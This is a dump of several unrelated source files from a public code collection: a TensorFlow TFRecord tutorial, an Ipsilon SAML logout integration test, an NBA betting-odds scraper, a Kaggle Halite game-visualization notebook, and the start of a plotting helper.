A non-tensor function, like `create_example`, can be wrapped with `tf.py_function` to make it compatible.\n\nUsing `tf.py_function` requires that you specify the shape and type information that is otherwise unavailable:\n\"\"\"\n\n\ndef tf_serialize_example(f0, f1, f2, f3):\n tf_string = tf.py_function(\n serialize_example,\n (f0, f1, f2, f3), # pass these args to the above function.\n tf.string) # the return type is `tf.string`.\n return tf.reshape(tf_string, ()) # The result is a scalar\n\n\ntf_serialize_example(f0, f1, f2, f3)\n\n\"\"\"Apply this function to each element in the dataset:\"\"\"\n\nserialized_features_dataset = features_dataset.map(tf_serialize_example)\n\n\ndef generator():\n for features in features_dataset:\n yield serialize_example(*features)\n\n\nserialized_features_dataset = tf.data.Dataset.from_generator(\n generator, output_types=tf.string, output_shapes=())\n\n\n\"\"\"And write them to a TFRecord file:\"\"\"\n\nfilename = 'test.tfrecord'\nwriter = tf.data.experimental.TFRecordWriter(filename)\nwriter.write(serialized_features_dataset)\n\n\"\"\"### Reading a TFRecord file\n\nWe can also read the TFRecord file using the `tf.data.TFRecordDataset` class.\n\nMore information on consuming TFRecord files using `tf.data` can be found [here](https://www.tensorflow.org/guide/datasets#consuming_tfrecord_data).\n\nUsing `TFRecordDataset`s can be useful for standardizing input data and optimizing performance.\n\"\"\"\n\nfilenames = [filename]\nraw_dataset = tf.data.TFRecordDataset(filenames)\n\n\"\"\"At this point the dataset contains serialized `tf.train.Example` messages. When iterated over it returns these as scalar string tensors.\n\nUse the `.take` method to only show the first 10 records.\n\nNote: iterating over a `tf.data.Dataset` only works with eager execution enabled.\n\"\"\"\n\nfor raw_record in raw_dataset.take(10):\n print(repr(raw_record))\n\n\"\"\"These tensors can be parsed using the function below.\n\nNote: The `feature_description` is necessary here because datasets use graph-execution, and need this description to build their shape and type signature.\n\"\"\"\n\n# Create a description of the features.\nfeature_description = {\n 'feature0': tf.io.FixedLenFeature([], tf.int64, default_value=0),\n 'feature1': tf.io.FixedLenFeature([], tf.int64, default_value=0),\n 'feature2': tf.io.FixedLenFeature([], tf.string, default_value=''),\n 'feature3': tf.io.FixedLenFeature([], tf.float32, default_value=0.0),\n}\n\n\ndef _parse_function(example_proto):\n # Parse the input tf.Example proto using the dictionary above.\n return tf.io.parse_single_example(example_proto, feature_description)\n\n\n\"\"\"Or use `tf.parse example` to parse a whole batch at once.\n\nApply this finction to each item in the dataset using the `tf.data.Dataset.map` method:\n\"\"\"\n\nparsed_dataset = raw_dataset.map(_parse_function)\n\n\"\"\"Use eager execution to display the observations in the dataset. There are 10,000 observations in this dataset, but we only display the first 10. The data is displayed as a dictionary of features. 
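(A sketch of the batch variant mentioned above, not in the original: `raw_dataset.batch(32).map(lambda b: tf.io.parse_example(b, feature_description))` parses 32 serialized records per call instead of one at a time.)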
Each item is a `tf.Tensor`, and the `numpy` element of this tensor displays the value of the feature.\"\"\"\n\nfor parsed_record in parsed_dataset.take(10):\n print(repr(parsed_record))\n\n\"\"\"Here, the `tf.parse_example` function unpacks the `tf.Example` fields into standard tensors.\n\n## TFRecord files in python\n\nThe `tf.io` module also contains pure-Python functions for reading and writing TFRecord files.\n\n### Writing a TFRecord file\n\nNow write the 10,000 observations to the file `test.tfrecords`. Each observation is converted to a `tf.Example` message, then written to file. We can then verify that the file `test.tfrecords` has been created.\n\"\"\"\n\n# Write the `tf.Example` observations to the file.\nwith tf.io.TFRecordWriter(filename) as writer:\n for i in range(n_observations):\n example = serialize_example(feature0[i], feature1[i], feature2[i], feature3[i])\n writer.write(example)\n\n\n\"\"\"### Reading a TFRecord file\n\nThese serialized tensores can be easily parsed using `tf.train.Example.ParseFromString`\n\"\"\"\n\nfilenames = [filename]\nraw_dataset = tf.data.TFRecordDataset(filenames)\n\nfor raw_record in raw_dataset.take(1):\n example = tf.train.Example()\n example.ParseFromString(raw_record.numpy())\n print(example)\n\n\"\"\"## Walkthrough: Reading/Writing Image Data\n\nThis is an example of how to read and write image data using TFRecords. The purpose of this is to show how, end to end, input data (in this case an image) and write the data as a TFRecord file, then read the file back and display the image.\n\nThis can be useful if, for example, you want to use several models on the same input dataset. Instead of storing the image data raw, it can be preprocessed into the TFRecords format, and that can be used in all further processing and modelling.\n\nFirst, let's download [this image](https://commons.wikimedia.org/wiki/File:Felis_catus-cat_on_snow.jpg) of a cat in the snow and [this photo](https://upload.wikimedia.org/wikipedia/commons/f/fe/New_East_River_Bridge_from_Brooklyn_det.4a09796u.jpg) of the Williamsburg Bridge, NYC under construction.\n\n### Fetch the images\n\"\"\"\n\ncat_in_snow = tf.keras.utils.get_file('320px-Felis_catus-cat_on_snow.jpg', 'https://storage.googleapis.com/download.tensorflow.org/example_images/320px-Felis_catus-cat_on_snow.jpg')\nwilliamsburg_bridge = tf.keras.utils.get_file('194px-New_East_River_Bridge_from_Brooklyn_det.4a09796u.jpg', 'https://storage.googleapis.com/download.tensorflow.org/example_images/194px-New_East_River_Bridge_from_Brooklyn_det.4a09796u.jpg')\n\ndisplay.display(display.Image(filename=cat_in_snow))\ndisplay.display(display.HTML('Image cc-by: Von.grzanka'))\n\ndisplay.display(display.Image(filename=williamsburg_bridge))\ndisplay.display(display.HTML('From Wikimedia'))\n\n\"\"\"### Write the TFRecord file\n\nAs we did earlier, we can now encode the features as types compatible with `tf.Example`. In this case, we will not only store the raw image string as a feature, but we will store the height, width, depth, and an arbitrary `label` feature, which is used when we write the file to distinguish between the cat image and the bridge image. 
We will use `0` for the cat image, and `1` for the bridge image.\n\"\"\"\n\nimage_labels = {\n cat_in_snow: 0,\n williamsburg_bridge: 1,\n}\n\n# This is an example, just using the cat image.\nimage_string = open(cat_in_snow, 'rb').read()\n\nlabel = image_labels[cat_in_snow]\n\n# Create a dictionary with features that may be relevant.\n\n\ndef image_example(image_string, label):\n image_shape = tf.image.decode_jpeg(image_string).shape\n\n feature = {\n 'height': _int64_feature(image_shape[0]),\n 'width': _int64_feature(image_shape[1]),\n 'depth': _int64_feature(image_shape[2]),\n 'label': _int64_feature(label),\n 'image_raw': _bytes_feature(image_string),\n }\n\n return tf.train.Example(features=tf.train.Features(feature=feature))\n\n\nfor line in str(image_example(image_string, label)).split('\\n')[:15]:\n print(line)\nprint('...')\n\n\"\"\"We see that all of the features are now stores in the `tf.Example` message. Now, we functionalize the code above and write the example messages to a file, `images.tfrecords`.\"\"\"\n\n# Write the raw image files to images.tfrecords.\n# First, process the two images into tf.Example messages.\n# Then, write to a .tfrecords file.\nrecord_file = 'images.tfrecords'\nwith tf.io.TFRecordWriter(record_file) as writer:\n for filename, label in image_labels.items():\n image_string = open(filename, 'rb').read()\n tf_example = image_example(image_string, label)\n writer.write(tf_example.SerializeToString())\n\n\n\"\"\"### Read the TFRecord file\n\nWe now have the file `images.tfrecords`. We can now iterate over the records in the file to read back what we wrote. Since, for our use case we will just reproduce the image, the only feature we need is the raw image string. We can extract that using the getters described above, namely `example.features.feature['image_raw'].bytes_list.value[0]`. 
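(An aside, not in the original: if a decoded pixel tensor is wanted rather than the raw byte string, `tf.io.decode_jpeg(image_raw)` rebuilds the image array from it.)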
We also use the labels to determine which record is the cat as opposed to the bridge.\n\"\"\"\n\nraw_image_dataset = tf.data.TFRecordDataset('images.tfrecords')\n\n# Create a dictionary describing the features.\nimage_feature_description = {\n 'height': tf.io.FixedLenFeature([], tf.int64),\n 'width': tf.io.FixedLenFeature([], tf.int64),\n 'depth': tf.io.FixedLenFeature([], tf.int64),\n 'label': tf.io.FixedLenFeature([], tf.int64),\n 'image_raw': tf.io.FixedLenFeature([], tf.string),\n}\n\n\ndef _parse_image_function(example_proto):\n # Parse the input tf.Example proto using the dictionary above.\n return tf.io.parse_single_example(example_proto, image_feature_description)\n\n\nparsed_image_dataset = raw_image_dataset.map(_parse_image_function)\n\n\"\"\"Recover the images from the TFRecord file:\"\"\"\n\nfor image_features in parsed_image_dataset:\n image_raw = image_features['image_raw'].numpy()\n display.display(display.Image(data=image_raw))\n","repo_name":"Lornatang/TensorFlow2-tutorials","sub_path":"Experts_tutorial/Load_data/tf_records.py","file_name":"tf_records.py","file_ext":"py","file_size_in_byte":16896,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"29902828455","text":"from helpers.common import IpsilonTestBase # pylint: disable=relative-import\nfrom helpers.control import TC # pylint: disable=relative-import\nfrom helpers.http import HttpSessions # pylint: disable=relative-import\nimport os\nimport pwd\nfrom string import Template\n\n\nidp_g = {'TEMPLATES': '${TESTDIR}/templates/install',\n 'CONFDIR': '${TESTDIR}/etc',\n 'DATADIR': '${TESTDIR}/lib',\n 'CACHEDIR': '${TESTDIR}/cache',\n 'HTTPDCONFD': '${TESTDIR}/${NAME}/conf.d',\n 'STATICDIR': '${ROOTDIR}',\n 'BINDIR': '${ROOTDIR}/ipsilon',\n 'WSGI_SOCKET_PREFIX': '${TESTDIR}/${NAME}/logs/wsgi'}\n\n\nidp_a = {'hostname': '${ADDRESS}:${PORT}',\n 'admin_user': '${TEST_USER}',\n 'system_user': '${TEST_USER}',\n 'instance': '${NAME}',\n 'testauth': 'yes',\n 'pam': 'no',\n 'gssapi': 'no',\n 'ipa': 'no',\n 'server_debugging': 'True'}\n\n\nsp_g = {'HTTPDCONFD': '${TESTDIR}/${NAME}/conf.d',\n 'SAML2_TEMPLATE': '${TESTDIR}/templates/install/saml2/sp.conf',\n 'CONFFILE': '${TESTDIR}/${NAME}/conf.d/ipsilon-%s.conf',\n 'HTTPDIR': '${TESTDIR}/${NAME}/%s'}\n\n\nsp_a = {'hostname': '${ADDRESS}',\n 'saml_idp_metadata': 'https://127.0.0.10:45080/idp1/saml2/metadata',\n 'saml_auth': '/sp',\n 'httpd_user': '${TEST_USER}'}\n\n\nsp_b = {'hostname': '${ADDRESS}',\n 'saml_idp_metadata': 'https://127.0.0.10:45080/idp1/saml2/metadata',\n 'no_saml_soap_logout': 'True',\n 'saml_auth': '/sp',\n 'httpd_user': '${TEST_USER}'}\n\n\n# Global list of SP's\nsplist = [\n {\n 'nameid': 'sp1',\n 'addr': '127.0.0.11',\n 'port': '45081',\n },\n {\n 'nameid': 'sp2',\n 'addr': '127.0.0.11',\n 'port': '45082',\n },\n {\n 'nameid': 'sp3',\n 'addr': '127.0.0.11',\n 'port': '45083',\n },\n {\n 'nameid': 'sp4',\n 'addr': '127.0.0.11',\n 'port': '45084',\n },\n {\n 'nameid': 'sp5',\n 'addr': '127.0.0.11',\n 'port': '45085',\n },\n]\n\n\ndef fixup_sp_httpd(httpdir):\n location = \"\"\"\n\nAlias /sp ${HTTPDIR}/sp\n\n\n \n Require all granted\n \n \n Order Allow,Deny\n Allow from All\n \n\n\nAlias /open ${HTTPDIR}/open\n\n\n\n\"\"\"\n index = \"\"\"WORKS!\"\"\"\n logged_out = \"\"\"Logged out\"\"\"\n\n t = Template(location)\n text = t.substitute({'HTTPDIR': httpdir})\n with open(httpdir + '/conf.d/ipsilon-saml.conf', 'a') as f:\n f.write(text)\n\n os.mkdir(httpdir + '/sp')\n with open(httpdir + '/sp/index.html', 
'w') as f:\n f.write(index)\n os.mkdir(httpdir + '/open')\n with open(httpdir + '/open/logged_out.html', 'w') as f:\n f.write(logged_out)\n\n\ndef ensure_logout(session, idp_name, sp_url):\n \"\"\"\n Fetch the secure page without following redirects. If we get\n a 303 then we should be redirected to the IDP for authentication\n which means we aren't logged in.\n\n Returns nothing or raises exception on error\n \"\"\"\n try:\n logout_page = session.fetch_page(idp_name, sp_url,\n follow_redirect=False)\n if logout_page.result.status_code != 303:\n raise ValueError('Still logged into url')\n except ValueError:\n raise\n\n return True\n\n\nclass IpsilonTest(IpsilonTestBase):\n\n def __init__(self):\n super(IpsilonTest, self).__init__('testlogout', __file__)\n\n def setup_servers(self, env=None):\n self.setup_step(\"Installing IDP server\")\n name = 'idp1'\n addr = '127.0.0.10'\n port = '45080'\n idp = self.generate_profile(idp_g, idp_a, name, addr, port)\n conf = self.setup_idp_server(idp, name, addr, port, env)\n\n self.setup_step(\"Starting IDP's httpd server\")\n self.start_http_server(conf, env)\n\n for spdata in splist:\n nameid = spdata['nameid']\n addr = spdata['addr']\n port = spdata['port']\n self.setup_step(\"Installing SP server %s\" % nameid)\n\n # Configure sp3 and sp4 for only HTTP Redirect to test\n # that a mix of SOAP and HTTP Redirect will play nice\n # together.\n if nameid in ['sp3', 'sp4']:\n sp_prof = self.generate_profile(\n sp_g, sp_b, nameid, addr, str(port), nameid\n )\n else:\n sp_prof = self.generate_profile(\n sp_g, sp_a, nameid, addr, str(port), nameid\n )\n conf = self.setup_sp_server(sp_prof, nameid, addr, str(port), env)\n fixup_sp_httpd(os.path.dirname(conf))\n\n self.setup_step(\"Starting SP's httpd server\")\n self.start_http_server(conf, env)\n\n\nif __name__ == '__main__':\n\n idpname = 'idp1'\n user = pwd.getpwuid(os.getuid())[0]\n\n sess = HttpSessions()\n sess.add_server(idpname, 'https://127.0.0.10:45080', user, 'ipsilon')\n for sp in splist:\n spname = sp['nameid']\n spurl = 'https://%s:%s' % (sp['addr'], sp['port'])\n sess.add_server(spname, spurl)\n\n with TC.case('Authenticate to IdP'):\n sess.auth_to_idp(idpname)\n\n for sp in splist:\n spname = sp['nameid']\n with TC.case('Add SP Metadata for %s to IdP' % spname):\n sess.add_sp_metadata(idpname, spname)\n\n with TC.case('Logout without logging into SP'):\n page = sess.fetch_page(idpname, '%s/%s?%s' % (\n 'https://127.0.0.11:45081', 'saml2/logout',\n 'ReturnTo=https://127.0.0.11:45081/open/logged_out.html'))\n page.expected_value('text()', 'Logged out')\n\n with TC.case('Access SP Protected Area'):\n page = sess.fetch_page(idpname, 'https://127.0.0.11:45081/sp/')\n page.expected_value('text()', 'WORKS!')\n\n with TC.case('Logout from SP'):\n page = sess.fetch_page(idpname, '%s/%s?%s' % (\n 'https://127.0.0.11:45081', 'saml2/logout',\n 'ReturnTo=https://127.0.0.11:45081/open/logged_out.html'))\n page.expected_value('text()', 'Logged out')\n\n with TC.case('Try logout again'):\n page = sess.fetch_page(idpname, '%s/%s?%s' % (\n 'https://127.0.0.11:45081', 'saml2/logout',\n 'ReturnTo=https://127.0.0.11:45081/open/logged_out.html'))\n page.expected_value('text()', 'Logged out')\n\n with TC.case('Ensure logout'):\n ensure_logout(sess, idpname, 'https://127.0.0.11:45081/sp/')\n\n # Test logout from each of the SP's in the list to ensure that the\n # order of logout doesn't matter.\n for sporder in splist:\n with TC.case('Access SP PRotected Area of all SPs'):\n for sp in splist:\n spname = sp['nameid']\n 
spurl = 'https://%s:%s/sp/' % (sp['addr'], sp['port'])\n page = sess.fetch_page(idpname, spurl)\n page.expected_value('text()', 'WORKS!')\n\n with TC.case('Initiate logout from %s' % sporder['nameid']):\n logouturl = 'https://%s:%s' % (sp['addr'], sp['port'])\n page = sess.fetch_page(idpname, '%s/%s?%s' % (\n logouturl, 'saml2/logout',\n 'ReturnTo=https://127.0.0.11:45081/open/logged_out.html'))\n page.expected_value('text()', 'Logged out')\n\n with TC.case('Ensure logout of each SP'):\n for sp in splist:\n spname = sp['nameid']\n spurl = 'https://%s:%s/sp/' % (sp['addr'], sp['port'])\n ensure_logout(sess, idpname, spurl)\n\n # Test IdP-initiated logout\n with TC.case('Access SP Protected area of SP1'):\n page = sess.fetch_page(idpname, 'https://127.0.0.11:45081/sp/')\n page.expected_value('text()', 'WORKS!')\n\n with TC.case('Access SP Protected Area of SP2'):\n page = sess.fetch_page(idpname, 'https://127.0.0.11:45082/sp/')\n page.expected_value('text()', 'WORKS!')\n\n with TC.case('Access the IdP'):\n page = sess.fetch_page(idpname,\n 'https://127.0.0.10:45080/%s' % idpname)\n page.expected_value('//div[@id=\"welcome\"]/p/text()',\n 'Welcome %s!' % user)\n\n with TC.case('IdP-initiated logout'):\n page = sess.fetch_page(idpname,\n 'https://127.0.0.10:45080/%s/logout' % idpname)\n page.expected_value('//div[@id=\"content\"]/p/a/text()', 'Log In')\n\n with TC.case('Ensure logout of SP1'):\n ensure_logout(sess, idpname, 'https://127.0.0.11:45081/sp/')\n\n with TC.case('Ensure logout of SP2'):\n ensure_logout(sess, idpname, 'https://127.0.0.11:45082/sp/')\n\n with TC.case('Access the IdP'):\n page = sess.fetch_page(idpname,\n 'https://127.0.0.10:45080/%s/login' % idpname)\n page.expected_value('//div[@id=\"welcome\"]/p/text()',\n 'Welcome %s!' % user)\n\n with TC.case('IdP-initiated logout with no SP sessions'):\n page = sess.fetch_page(idpname,\n 'https://127.0.0.10:45080/%s/logout' % idpname)\n page.expected_value('//div[@id=\"logout\"]/p//text()',\n 'Successfully logged out.')\n","repo_name":"ipsilon-project/ipsilon","sub_path":"tests/testlogout.py","file_name":"testlogout.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"21585004294","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nfrom selenium import webdriver\n\n\ndef importCrownBetPage():\n #Opens the page and returns the html inside\n browser = webdriver.Chrome()\n url = \"https://crownbet.com.au/sports-betting/basketball/nba/\"\n browser.get(url)\n innerHTML = browser.execute_script(\"return document.body.innerHTML\")\n return innerHTML\n\ndef createCrownBetNBAMatchups():\n matchups = []\n currMatchup = ()\n pageHTML = importCrownBetPage()\n soup = BeautifulSoup(pageHTML, 'html5lib')\n#Crownbet organises their page in divs, so we find each div with the info we need\n matchupList = soup.findAll('div', {\"class\" : \"event-summary-table container-fluid visible-xs\"})\n for matchup in matchupList:\n #the info is contained in div \"rows\" so we retrieve them,\n matchupRows = matchup.findAll('div', {\"class\":\"row\"})\n #find the rows we need - the odds are in the 2nd and 5th rows,\n #and the name of the team is in the row before them.\n\n #for each team, get the name and odds and throw it into a tuple\n teamName1 = matchupRows[0]\n teamName1 = teamName1.find(\"span\", {\"class\":\"outcome-anchor-text\"}).text\n teamOdds1 = matchupRows[1]\n teamOdds1 = teamOdds1.find(\"span\", 
{\"class\":\"bet-amount\"}).text.strip()\n\n nameAndOdds1 = (teamName1, teamOdds1)\n\n teamName2 = matchupRows[3]\n teamName2 = teamName2.find(\"span\", {\"class\":\"outcome-anchor-text\"}).text\n teamOdds2 = matchupRows[4]\n teamOdds2 = teamOdds2.find(\"span\", {\"class\":\"bet-amount\"}).text.strip()\n nameAndOdds2 = (teamName2, teamOdds2)\n\n #then, create the currMatchup tuple and append it to the matchups list,\n #sorted by the highest odds first\n currMatchup = (nameAndOdds1, nameAndOdds2)\n sortedMatchup = sorted(currMatchup, key=lambda odds: odds[1], reverse=True)\n matchups.append(sortedMatchup)\n\n return matchups\n","repo_name":"cheelees/bettingScraper","sub_path":"crownBet.py","file_name":"crownBet.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71427322280","text":"import json\n\nfrom kaggle_environments.envs.halite.helpers import *\n\nfrom kaggle_environments import evaluate, make\n\nfrom kaggle_environments.envs.halite.helpers import *\n\nimport numpy as np\n\nimport pandas as pd\n\nwith open('../input/1235217json/1235217.json') as file:\n\n data = json.load(file)\n\n\n\nenv = make('halite', configuration=data['configuration'], steps=data['steps'])\n\nenv.render(mode=\"ipython\", width=800, height=600)\n\npre_count = 1\n\nsteps = []\n\nboard_halite = []\n\np0_halite = []\n\np1_halite = []\n\np2_halite = []\n\np3_halite = []\n\np0_cargo = []\n\np1_cargo = []\n\np2_cargo = []\n\np3_cargo = []\n\np0_ships = []\n\np1_ships = []\n\np2_ships = []\n\np3_ships = []\n\np0_shipyards = []\n\np1_shipyards = []\n\np2_shipyards = []\n\np3_shipyards = []\n\nconfiguration = env.configuration\n\n\n\nfor step_env in env.steps:\n\n observation = step_env[0]['observation']\n\n board = Board(observation, configuration)\n\n steps.append(observation['step'])\n\n last_step = observation['step']\n\n board_halite.append(sum(observation['halite']))\n\n p0_halite.append(board.players[0].halite)\n\n p1_halite.append(board.players[1].halite)\n\n p2_halite.append(board.players[2].halite)\n\n p3_halite.append(board.players[3].halite)\n\n p0_cargo.append(sum([ship.halite for ship in board.players[0].ships]))\n\n p1_cargo.append(sum([ship.halite for ship in board.players[1].ships]))\n\n p2_cargo.append(sum([ship.halite for ship in board.players[2].ships]))\n\n p3_cargo.append(sum([ship.halite for ship in board.players[3].ships]))\n\n p0_ships.append(len(board.players[0].ship_ids))\n\n p1_ships.append(len(board.players[1].ship_ids))\n\n p2_ships.append(len(board.players[2].ship_ids))\n\n p3_ships.append(len(board.players[3].ship_ids))\n\n p0_shipyards.append(len(board.players[0].shipyard_ids))\n\n p1_shipyards.append(len(board.players[1].shipyard_ids))\n\n p2_shipyards.append(len(board.players[2].shipyard_ids))\n\n p3_shipyards.append(len(board.players[3].shipyard_ids))\n\n\n\ndf = pd.DataFrame(\n\n data={'step': steps, 'board_halite': board_halite,\n\n 'p0_halite': p0_halite,\n\n 'p1_halite': p1_halite,\n\n 'p2_halite': p2_halite,\n\n 'p3_halite': p3_halite,\n\n 'p0_cargo': p0_cargo,\n\n 'p1_cargo': p1_cargo,\n\n 'p2_cargo': p2_cargo,\n\n 'p3_cargo': p3_cargo,\n\n 'p0_ships': p0_ships,\n\n 'p1_ships': p1_ships,\n\n 'p2_ships': p2_ships,\n\n 'p3_ships': p3_ships,\n\n 'p0_shipyards': p0_shipyards,\n\n 'p1_shipyards': p1_shipyards,\n\n 'p2_shipyards': p2_shipyards,\n\n 'p3_shipyards': p3_shipyards,\n\n },\n\n columns=['step', 'board_halite',\n\n 'p0_halite',\n\n 'p1_halite',\n\n 'p2_halite',\n\n 
'p3_halite',\n\n 'p0_cargo',\n\n 'p1_cargo',\n\n 'p2_cargo',\n\n 'p3_cargo',\n\n 'p0_ships',\n\n 'p1_ships',\n\n 'p2_ships',\n\n 'p3_ships',\n\n 'p0_shipyards',\n\n 'p1_shipyards',\n\n 'p2_shipyards',\n\n 'p3_shipyards',\n\n ]\n\n)\n\ndf['p0_total_halite'] = df['p0_halite'] + df['p0_cargo']\n\ndf['p1_total_halite'] = df['p1_halite'] + df['p1_cargo']\n\ndf['p2_total_halite'] = df['p2_halite'] + df['p2_cargo']\n\ndf['p3_total_halite'] = df['p3_halite'] + df['p3_cargo']\n\n\n\ndf\ndf.describe()\nimport seaborn as sns\n\nimport numpy as np \n\nimport pandas as pd \n\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns; sns.set() \n\nsns.set()\n\ndf0 = pd.DataFrame(\n\ndata={'player':'p0','step': steps, 'board_halite': board_halite,\n\n 'halite': p0_halite,\n\n 'cargo': p0_cargo,\n\n 'ships': p0_ships,\n\n 'shipyards': p0_shipyards,\n\n},\n\ncolumns=['player','step', 'board_halite',\n\n 'halite',\n\n 'cargo',\n\n 'ships',\n\n 'shipyards',\n\n ]\n\n)\n\ndf1 = pd.DataFrame(\n\ndata={'player':'p1','step': steps, 'board_halite': board_halite,\n\n 'halite': p1_halite,\n\n 'cargo': p1_cargo,\n\n 'ships': p1_ships,\n\n 'shipyards': p1_shipyards,\n\n},\n\ncolumns=['player','step', 'board_halite',\n\n 'halite',\n\n 'cargo',\n\n 'ships',\n\n 'shipyards',\n\n ]\n\n)\n\ndf2 = pd.DataFrame(\n\ndata={'player':'p2','step': steps, 'board_halite': board_halite,\n\n 'halite': p2_halite,\n\n 'cargo': p2_cargo,\n\n 'ships': p2_ships,\n\n 'shipyards': p2_shipyards,\n\n},\n\ncolumns=['player','step', 'board_halite',\n\n 'halite',\n\n 'cargo',\n\n 'ships',\n\n 'shipyards',\n\n ]\n\n)\n\ndf3 = pd.DataFrame(\n\ndata={'player':'p3','step': steps, 'board_halite': board_halite,\n\n 'halite': p3_halite,\n\n 'cargo': p3_cargo,\n\n 'ships': p3_ships,\n\n 'shipyards': p3_shipyards,\n\n},\n\ncolumns=['player','step', 'board_halite',\n\n 'halite',\n\n 'cargo',\n\n 'ships',\n\n 'shipyards',\n\n ]\n\n)\n\n\n\ndf_merged = pd.concat([df0,df1,df2,df3])\n\ndf_merged['total_halite'] = df_merged['halite'] + df_merged['cargo']\n\ndf_merged['cargo_average'] = df_merged['cargo'] / df_merged['ships']\n\ndf_merged['cargo_percentage'] = df_merged['cargo'] / df_merged['total_halite']\ndf_merged\nplt.figure(figsize=(12,8))\n\nplt.title(\"player halite at game end\", fontsize=15)\n\nsns.barplot(data=df_merged[df_merged['step']==last_step],x='player',y='halite',ci=None)\n\nplt.ylabel('halite', fontsize=12)\n\nplt.xlabel('player', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"average halite in game\", fontsize=15)\n\nsns.barplot(data=df_merged,x='player',y='halite',ci=None)\n\nplt.ylabel('mean halite', fontsize=12)\n\nplt.xlabel('player', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"player cargo at game end\", fontsize=15)\n\nsns.barplot(data=df_merged[df_merged['step']==last_step],x='player',y='cargo',ci=None)\n\nplt.ylabel('cargo', fontsize=12)\n\nplt.xlabel('player', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"player halite time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='halite' ,hue='player')\n\nplt.ylabel('halite', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"player and board halite time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='halite' ,hue='player')\n\nsns.lineplot(data=df,x='step',y='board_halite' ,color='black')\n\nplt.ylabel('halite', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"player cargo time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='cargo', 
hue='player')\n\nplt.ylabel('cargo', fontsize=12)\n\nplt.show()\n\nplt.figure(figsize=(12,8))\n\nplt.title(\"player cargo and board halite time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='cargo', hue='player')\n\nsns.lineplot(data=df,x='step',y='board_halite' ,color='black')\n\nplt.ylabel('cargo', fontsize=12)\n\nplt.show()\n\nplt.figure(figsize=(12,8))\n\nplt.title(\"total halite (halite + cargo) time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='total_halite', hue='player')\n\nplt.ylabel('halite (halite + cargo)', fontsize=12)\n\nplt.show()\n\nplt.figure(figsize=(12,8))\n\nplt.title(\"cargo percentage (cargo / (halite + cargo)) time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='cargo_percentage', hue='player')\n\nplt.ylabel('cargo percentage (cargo / (halite + cargo))', fontsize=12)\n\nplt.show()\n\nplt.figure(figsize=(12,8))\n\nplt.title(\"total shipyard count time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='shipyards', hue='player')\n\nplt.ylabel('shipyard count', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"average shipyard count in game\", fontsize=15)\n\nsns.barplot(data=df_merged,x='player',y='shipyards',ci=None)\n\nplt.ylabel('mean shipyard count', fontsize=12)\n\nplt.xlabel('player', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"total ship count time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='ships', hue='player')\n\nplt.ylabel('ship count', fontsize=12)\n\nplt.show()\n\nplt.figure(figsize=(12,8))\n\nplt.title(\"average ship count in game\", fontsize=15)\n\nsns.barplot(data=df_merged,x='player',y='ships',ci=None)\n\nplt.ylabel('mean ship count', fontsize=12)\n\nplt.xlabel('player', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"cargo average(cargo / ship count) time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='cargo_average', hue='player')\n\nplt.ylabel('cargo average', fontsize=12)\n\nplt.show()\n","repo_name":"aorursy/new-nb-3","sub_path":"iicyan_halite-result-visualization-from-leaderboard.py","file_name":"iicyan_halite-result-visualization-from-leaderboard.py","file_ext":"py","file_size_in_byte":8327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3434043588","text":"\n##################################################################################################################\n\"\"\"\n\n\"\"\"\n\n# Built-in/Generic Imports\nfrom datetime import datetime\n\n# Libs\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport six\n\n# Own modules\n\n\n__version__ = '1.1.1'\n__author__ = 'Victor Guillet'\n__date__ = '10/09/2019'\n\n#################################################################################################################\n\n\nclass Plot_tools:\n def __init__(self):\n pd.options.plotting.backend = \"plotly\"\n\n @staticmethod\n def plot_portfolio_overview(data, pair, counter_value, width=800, height=380, show_plot=False):\n fig = data.plot(x=\"date\", y=[\"portfolio_invested_\" + pair, \"portfolio_value_\" + pair])\n\n fig.update_layout(title=\"Portfolio performance - \" + pair.title(), title_x=0.5,\n yaxis_title=counter_value,\n autosize=False,\n width=width,\n height=height)\n\n if show_plot:\n fig.show()\n\n fig.write_image(\"Data/~temp/Portfolio_performance_\" + pair + \"_linechart.png\")\n\n return\n\n 
